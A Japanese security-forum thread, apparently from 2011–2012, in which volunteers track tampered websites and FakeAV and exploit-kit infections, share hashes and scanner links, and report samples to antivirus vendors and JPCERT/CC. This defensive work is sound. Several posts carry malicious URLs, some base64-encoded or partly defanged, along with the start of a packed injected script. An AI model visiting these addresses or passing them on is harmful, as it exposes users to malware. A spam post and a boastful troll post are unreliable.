お疲れ様です。

ぐぐったこれは関連するのかな？
ttp://www.threatexpert.com/report.aspx?md5=af0099681d9d24d1f887562e9d8c180a

>>878
いつもお疲れ様です

MD5同じなので同じファイルっぽいですね
scandsk.exeが相変わらず何もしないのでAnubisで解析させてみた
http://anubis.iseclab.org/?action=result&task_id=1a146b96de71dc7d4d5f47216b74caffe&format=html#id285810

…鯖が死んでてマルウェアダウンロードに失敗してるのかな

>>879
どもです。
またぐぐる。
http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~FakeAV-EPV/detailed-analysis.aspx
http://about-threats.trendmicro.com/malware.aspx?language=jp&name=TROJ_FAKEAV.GAC

301でbingに飛ばしてるとこはまだ死んでないっぽい？

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTEwMTYtMDQyNC0wNi93d3cuZGFuLmNvLnVrL3ZpZXdz
b3VyY2UvaW5kZXgucGhwP3VybD1odHRwJTNBJTJGJTJGOTguMTQyLjI0My42NCUyRmNocm9tZSUy
RnJlcG9ydC5odG1sJTNGNTU1NTV3NSUzRCU1RCVFRiVCRiVCRCVFRiVCRiVCRGNrJUVGJUJGJUJE
Y2dqZCVFRiVCRiVCRGolRUYlQkYlQkRqbW5oZSVEOCU5OSVFRiVCRiVCRG4lRUYlQkYlQkQlRUYl
QkYlQkQlRUYlQkYlQkQlRUYlQkYlQkRnJUVGJUJGJUJEZGtfamslNUIlRUYlQkYlQkQlRUYlQkYl
QkRyJUVGJUJGJUJEJUVEJThEJTg5JTVFJUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEb2Nna2RU
JUVGJUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEciVFRiVCRiVCRCVFRiVCRiVCRGIlQ0MlODhfJUVG
JUJGJUJEJUVGJUJGJUJEJUVGJUJGJUJEcWdveHVkZ3lramhnaHolRUYlQkYlQkR6a3phZXdoYmN2
Y2Nsamlmd2YlNUIlRTklOUElQUN1X2FkYiU1RWRkYyU1RWZkZmVlZWUlRUYlQkYlQkRlaWpUJUVG
JUJGJUJEcWIlNUViZGNfZmhZ

EXEとWebページがまた新型に。本当に毎日変更ですなｗ

EXE
16d9696f4a32bcd571c5c55ac5e4fcb9cc3348ac7ec936ad6c46c447e63d626b-1318780277

Webページ
ab0e74102c941cff75b0ee3469c95a41484d29043d17f874a5faa5f14665805d-1318781102

VMだから偽アンチウイルスが発動しないのか、日本IPは弾かれてるのか…
往時の8080は鯖さえ生きてればお構いなく発動したもんですが

もう、いやん
JSUNPACK
d127c4dba13422aaba02157e6e0111c09d91401f

http://hibari.2ch.net/test/read.cgi/sec/1006822399/429

>>883
http://www.google.co.jp/search?q=site:www.bookoff.co.jp+%E6%94%B9%E3%81%96%E3%82%93
子会社含めて今度で4回目って酷いな
HP管理委託業者の名前を晒してほしい

ブックオフかい…

http://koikemasaya●com/

gredでフィッシングサイト判定になっていて改ざんされてるっぽい

大規模なASP.NET攻撃によりWebサイトが訪問者を攻撃
http://scan.netsecurity.ne.jp/archives/52024460.html

>>853

>>886
侵略されちゃってますね

>>886
投稿フォームからのスパムっぽい
とりあえずスパムの削除依頼してみた＞ばりゅどめ

>>889-890
ご対応感謝するでゲソ！

virscan.orgって更新されたっぽい？

ぱっと見た感じ従来と変わらんようだけど?

http://uptime.netcraft.com/up/graph?site=http://virscan.org/
IPアドレスが一時的に変わってた
代替サーバにしてメンテナンスしてたのかも

ﾉｼ

Flash 11.1.102.55

ESETのステマサイトだろうけどGumblarの解説としては読みやすい
http://www.seculead.jp/tokushu/gumblar.html
http://30tx.com/ ツイッターで宣伝中 http://goo.gl/sNq5y+

公式で堂々とやらないのが-100点

Gumblarは今は活動してないよ
Gumblar.xは2010年11月以降動かず止まったまま
htaccessリダイレクトは偽ウイルス対策ソフトの感染キャンペーン

Wordpressのtimthumb.phpの脆弱性でだいぶ攻撃がお盛ん (´Ａ｀;
ttp://www.google.co.jp/search?q=%22Fatal+error:+Cannot+redeclare+_765258526%22&hl=ja&lr=lang_ja&num=100

>>898
ぅゎゎ

調子悪いので保留。。。orz.....

こんなかんじ？
JSUNPACK
899a47a3cb97a613973f7721405b58670ee8a5ad
飛び先は404っぽい

なんか違ってた
>>900はなかったことに。。。

ん？合ってるんかな？

ドメインの解決が出来ないんだけど
いろいろあるみたい
ttp://www.google.com/safebrowsing/diagnostic?site=osa.pl
ttp://www.siteadvisor.com/sites/osa.pl/msgpage
ttp://safeweb.norton.com/report/show?url=osa.pl

げっとしたっぽい

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjIzOC0wNy9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3


二回目以降のアクセスはスクリプトが消える仕様？

aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjI0OC0yMS9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTEtMTEyNS0yMjMyLTQ3L3d3dy5kYW4uY28udWsv
dmlld3NvdXJjZS9pbmRleC5waHA/dXJsPWh0dHAlM0ElMkYlMkZtZXNzaW5vaGV5YSUyRWluZm8l
MkZhdXRob3IlMkZhZG1pbg==


>>900で見つけたはずなのに、わからなくなったので>>901

>>898
こりか
http://www.jpcert.or.jp/wr/2011/wr113001.html#3

>>904
http://www.virustotal.com/file-scan/report.html?id=a08fca5de60440093999018312d12c97e3927b5f2af75348633d264748852d33-1322234054

　

[厚労省サーバー感染、ＰＣ１万台ネット接続不能]
http://www.yomiuri.co.jp/national/news/20111129-OYT1T01327.htm

労災などの業務管理を行う厚生労働省の情報システムのサーバーが、ウイルス対策ソフトを装ったコンピューターウイルス
に感染し、同システムにつながる全国約１万台のパソコンが点検のため、今月２５日からインターネットに接続できなくな
っていることが、わかった。情報流出は確認されていない。ウイルスは無差別に感染するタイプとみられ、同省が復旧を急
いでいる。

同省によると、感染したのは、労災の申請や認定、支給などの処理を行う情報システム。今月２５日、福岡労働局の職員が
業務中に企業のホームページを閲覧中、パソコンが勝手にウイルス検索を始めるなどしたため、不審に思った職員が申し出
て感染が判明した。
ウイルス対策会社によると、このウイルスはネット上で仕込まれたページを開いただけで感染するタイプで、ウイルス対策
ソフトを装ってクレジットカード情報などを要求。２年ほど前から国内でも感染が増加しているという。

▽読売新聞（2011年11月30日03時09分）

コンピューターウイルスにやられたと偽って
わざと流出させている恐れもある

ちゃんとJRE 6 Update 29にしておるかー？
そこで対処されたCVE-2011-3544の攻撃処理がBlackholeに積まれたぞい ヽ(;´Д｀)ノ
ttps://www-304.ibm.com/connections/blogs/tokyo-soc/entry/dbyd_20111031

www●cave●co●jp

Googleでは「このサイトはコンピュータに損害を与える可能性があります。」になってる

ちょいまえに北
見てる途中でメンテになったお
ここ見てるのかな？

ユーザーから言われたか何かで気づいたのかもしれん

そかも

とりあえずそれっぽいのはげとしたかも
飛び先は404っぽい

JS（ｒｙ
8674564d35fb2e06f5ec059b6bfded1b26c048ea

V（ｒｙ
9f065297b0fa42157b748f285347a1d3a8401d3e9c58dee686fd82392b169abc

IPAとJPCERT/CC、ベンダーいくつかにトス

まかひからdatが北
なんか早いぽ。

>>914
あびら対応予定
JS/IFrame.aba

www●wisdomlead●co●jp/

眩暈が

>>917
お疲れ様です。
上流にメルしまひた。

なつかしの8080とかぱっとみでみっつスクリプトの内ふたつは検出率が低かったのでベンダーにトスしやした。
かすぺの自動応答にスパム扱いされちゃいました。
踏み台になってたかもん

ttp://member.square-enix.com/
ttp://www.square-enix.com/jp/members/info/mainte.html
これの詳細わかる人居ますかね?
検体拾いたいんだけどGoogleキャッシュにも残ってねぇ

google.com が感染？
http://www.google.com/safebrowsing/diagnostic?site=google.com/
http://megalodon.jp/2011-1214-1138-36/bit.ly/uwD8pu

tp://www.google.com/safebrowsing/diagnostic?site=http://initial-m●net/

>>920
詳細わからんのでなんともいえんけど
クライアントへの攻撃スクリプトが仕込まれたわけじゃなくて
どっかの入力フォームからサーバーが攻撃されたってだけかもよ

ああ改ざんもあったのね
期間短いと探せないかもな

>>920
NEVERのキャッシュ

見つからんかった

http://www.

allgov.com/Unusual_News/ViewNews/
Last_Man_Still_Living_in_Japans_Nuclear_Exclusion_Zone_111223


Aviraに反応のあったサイト
シマとグレッドには伝えておきました。
各自念の為伝達よろしくお願いします。（ちなみに。。。海外の福島関連の記事です）


avira.com解説
http://www.avira.com/ja/support-threats-summary-product/tid/4486/threat/HTML%252FPicFrame.Gen/track/1
※ヒューリスティック特別な検出

>>926
これは誤検知、というか実害がない
CAPTCHA用の画像ファイル内部にHTMLタグが誤って挿入されてしまってるだけ

絶賛放置中
www●hototogisu-kun●com/
↓
＜script type='text/javascript'＞eval（function（p,a,c,k,e,d･･

("p") か
　("o") い
　　("q") ざ
　　　("r") ん

ちょい前北
>>928
見てる間にコード消されたっぽい

JSUNPACK
636292fe671d98d993c0a8af701627c4750e1003

飛び先は404っぽい

って、戻ってるお (´･ω･`)
消したんじゃなかったのか？>928

再改竄かお。
JSUNPACK
5f2bcf2b562358f2fd82d6b470c6e3a3e4ec3b53

ｺｰﾄﾞは>930に戻って消えた。
ttp://www.virustotal.com/url-scan/report.html?id=d69fe84155629544a223c63c8a1beb07-1325650248
ttp://www.virustotal.com/file-scan/report.html?id=2a0a8a5f35979c12f5b8eb17609b1f637a971d1121a36332efe93cfd79f04d0e-1325653858

>>928-933
Dan's View Sourceの魚拓
backupurl●com/31luot

皆さん乙彼~
時々、最新情報をチェックしてみて下さい。。。


改ざん - Google ニュース検索　(*日付順 )
http://goo.gl/9bsMb

サイバー攻撃 - Google ニュース検索　(*日付順 )
http://goo.gl/N7GCO

やがちゃんのでも短縮URLは踏む気にならんわ

VirusTotalがリニューアルされてますね。
Max32MBまでになってるし。
あとは落ちている事が少なくなればいいなぁ。

http://dispatch100511n●blog●so-net●ne●jp

んー

>>938
久しぶりに検体が落ちてきた
順次virustotalに上げてみる

https://www.virustotal.com/file/0a7f5a21c2ce2d023652feb9dacdc325e5ca72fc99db2916728265b535fa39e6/analysis/1326598611/
https://www.virustotal.com/file/821fefc831fb4eca89e8a0d6b2d604fcde97c8c934416c28481ff3cfb95d9702/analysis/1326598630/
https://www.virustotal.com/file/53f295dfb1870f49c3e7842dfb5f22ce1d5f26e91b23c1740a0e48769000ce8c/analysis/1326598647/
https://www.virustotal.com/file/2340ee44273d0b1416ba723a0d2137e7ff113b934f691078894a99925d35eab3/analysis/1326598876/
https://www.virustotal.com/file/461ecf664395d720203d606ed6c018fd12eafa70e7b40ec6f11521cb76f296e2/analysis/1326598888/
https://www.virustotal.com/file/a4c4e6cb3325d9333bc14659b1bca8dcfcc346d9f60a17965cbe43a8629fa8b7/analysis/1326598903/
https://www.virustotal.com/file/38bb78b363bc739299b7c033a7e3b2f8f06509af3d92903751b32730879997f6/analysis/1326599366/
https://www.virustotal.com/file/22409beb91faa25e256d314113294afc3efdb5b0e90d1fc2e676cb6e62f5434e/analysis/1326600198/
大半はすでに対応済みのようで
画面上は変化なし、プロセスが複数常駐で何かインターネットに送信中
bot系かな

>>936
つホレ

■Know URL - 短縮URLを展開チェック
http://knowurl.com/
■GetLinkInfo - 短縮URLを展開チェック
http://www.getlinkinfo.com/

>>941
めんどい

攻撃者向けのマルウェアチェックサイトをロシアで発見
http://scan.netsecurity.ne.jp/article/2012/01/13/28107.html

そういうのは前からあるよね
ttp://lhsp.s206.xrea.com/misc/virusscan.html#crimescan

セキュリティ初心者質問スレッドpart129
http://kohada.2ch.net/test/read.cgi/sec/1323593004/79
５箇所ほど貼られてるようだけど
これ何？IPはベナン。。。
http://www

-mediafire-com-wmi9t7s3zu9z251.tk/

urlvoid.com調査ではIP Countryはチェコでした。UNRATEDが４件。
virustotal.comではUNRATEDが３件

http://www.shibakyu.jp/shopping/

世界は喫煙を推進しています。会から有能な人材がウィキペディアに参加しています。皆様方も喫煙化にご協力ください。

>>947
なんたらかんたら.osa.pl/showthread.php?t=なんたらかんたら

復活の呪文

www●dernier-exile●com

んー

www.majin0001●com/

JRE 脆弱性更新

;; ::: ::　:　 : 　　＿＿＿＿＿＿＿＿＿＿___　　　　: 　: :　:　:: :::: ::::: :;::;::::: ::::
;;::: ::: :: : : 　 ／|：： ┌──────┐ ：：| ／　ﾋﾟﾛﾝ♪ﾋﾟﾛﾝ♪　:　:::　:::: :;::;
;;::: ::: : : 　　.　. |：： ｜　　　　　　　　 .｜ ：：|　緊急ぬるぽ速報です　:　:: : ::: ::;:;
;;: :: :;;: :: :　　　 |：：　緊急ぬるぽ速報 ..：：|　　強いぬるぽに警戒してください
;;: :: : ;;: :: :　 ..　|：：..｜ 　 　　　　　　..｜ ：：| ＼ 　 　 　 　　　　　　　: :: :: ::; :: ;
;;: :: :　;;: :: :　..　|：：..└──────┘：：| : :: :: ::; :: ; : :: :: ::; :: ;: :: :: ::: :: :: ; :: ;
;: :　;;: :: :　　...　|：：　　 ┌────┐　　 | : :: :: ::; :: ;　:　; :　:; : :: :: :: :: :: :::; :: ;
　　　　　||　ﾄﾞｻｯ　￣￣￣￣￣￣￣￣￣￣　　　 //∧_∧
　　☆ 　　＿＿　　￣￣￣￣￣￣￣￣￣￣￣￣（（(ﾞﾟ'ωﾟ'））)　うぁぁぁ
　　　　ヽ/＼＿＼　ｺﾞﾝ　　　　[#]::　　　　 　　::[#]　と_ 　 ヽ ヽ
　 　　　 ＼/＿_/ ⌒)　　　|￣￣￣￣￣￣￣￣￣￣￣| ＿）））
　　　　⊂⌒((；‐ω‐)）　 　￣|￣|￣￣￣￣￣￣|￣|￣ 　　~}

ガンブラー攻撃の再来？　FTPパスワードを盗むマルウェア感染の報告相次ぐ
http://www.itmedia.co.jp/enterprise/articles/1203/06/news048.html

Lizamoon系再開
hjfghj.com/r.php ttp://www.google.co.jp/search?q=%22http:%2F%2Fhjfghj.com%2Fr.php%22
fgthyj.com/r.php ttp://www.google.co.jp/search?q=%22http:%2F%2Ffgthyj.com%2Fr.php%22

jsunpackって最近死んでる？

wepawetでok

http○//proxyrider○com

ほしゅ

保守あげ

あげほす

>>960-962
2001年作成のスレがごろごろあるセキュ板で保守など必要ない

AvastとAviraは例外として
それ以外・・・すなわち、�@Panda　�AAVG　�BALYac �CJUST　�DKing　�EComodo　�FMSE
このあたりのフリーソフトでどれにするか迷っているなら、絶対に�FMSEにすべきだね
日々ありとあらゆる感染実験をし、世界のクラッカーコミュを渡り歩き
英文でさまざまな解決策論文を発表し、痴餌袋等でも迷える子羊たちにバンバン指南し解決に導いている
FakeAVの研究では世界をリードしているプロの俺様がいうのだから間違いない( ｰ`дｰ´)ｷﾘｯ

頭悪そう＞＜；；

8080っぽいのが北
こちらの環境では到達できにゃー
件名 : POST/EDIT/DELETE : "Local News in Astoria Journal " (rvs)

d9378c84f32ddc157bdbe1b59790fa084485e4d2

蕗ｶｷｺ

.

ＴＣＧ「ヴァンガード」の公式ＨＰがウィルス感染とかいう話題を耳にしたんだが・・・？

>>969
ニュースでやってたね。
具体的なウイルスの種類は言わなかったけど。

ヴァンガードHPなど3サイトがウイルス感染　中の人「感染したっぽいから閲覧を控えて…。」
http://hayabusa3.2ch.net/test/read.cgi/news/1342251052/

http://www●mcd-inc●co●jp/
http://www●matsue-yado●com/

乙です。
修正済みっぽい

めも
c3284d
km0ae9gr6m

http://www●studiokirsche●com/
http://www●aqua-refine●com/

http://note24book●com/

どこ？

http://kohada.2ch.net/test/read.cgi/bicycle/1343949441/
↑のスレにてGENOの亜種に感染の報告有り。

>>977
お疲れ様です。
Aviraから「JS/Luyeb.A」で対応予定と回答が来ました。
KasperskyとMicrosoftは回答待ちです。
JPCERT/CCには報告済みです。

>>978
対応ありがとうございます。
現在当該サイトは閉鎖しています。

http://www●eekatei●com/

KasperskyとAviraに検体提出。
JPCERT/CCには報告済みです。

>>979
ﾉｼ

>>980
結果が返ってきました。
Kaspersky「Trojan.JS.Agent.byo」
Avira「JS/Obfuscated.CR」

まーたin.cgiか